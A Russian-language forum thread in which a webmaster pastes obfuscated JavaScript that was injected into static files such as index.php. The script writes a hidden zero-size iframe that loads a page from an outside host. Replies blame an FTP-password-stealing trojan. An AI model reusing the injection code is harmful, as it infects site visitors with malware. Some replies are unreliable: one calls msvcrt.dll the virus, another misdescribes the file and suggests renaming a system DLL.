Весь сайт защищен везде SQL-Inj. Все вводимы даные фильтруются. Но всеже в некоторых файлах стали появляться такие вот вещи: [js]<!-- ~ --><SCRIPT Language="JavaScript"> document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A")); </SCRIPT><!-- ~ -->[/js] Самое главное что они появляются в таких файлах как index.php в самом конце или начале. Т.е. в таких местах которые не формируются и имеют постоянный контент. Проверил все папки нигде шелла нету. Если это чтото противоестественное как оно проникло? Это стало появлятся когда поставил PHP 5.2.4
Петр Не дыра а троянца хапнули (а он оправил пароль от FTP злоумышленнику) поиском можно было бы и воспользоваться
Вот самое подробное что смог вспомнить http://forum.searchengines.ru/showthread.php?t=126831 (не точно про ту модификацию, но троян тот-же) http://forum.searchengines.ru/showpost. ... stcount=12 (подробности)
Внимание всем кто сталкнулся с данными проблемами... C:/WINDOWS/System32/msvcrt.dll и есть этот вирус.
Вы посмотрите получше, этот файл имеет электронную подпись и принадлежит ОС. Это вроде бы, исполняемый файл таск менеджера. Переименуйте версию, после чего появится такой же файл. Если размер файлов разный - старый был заражен.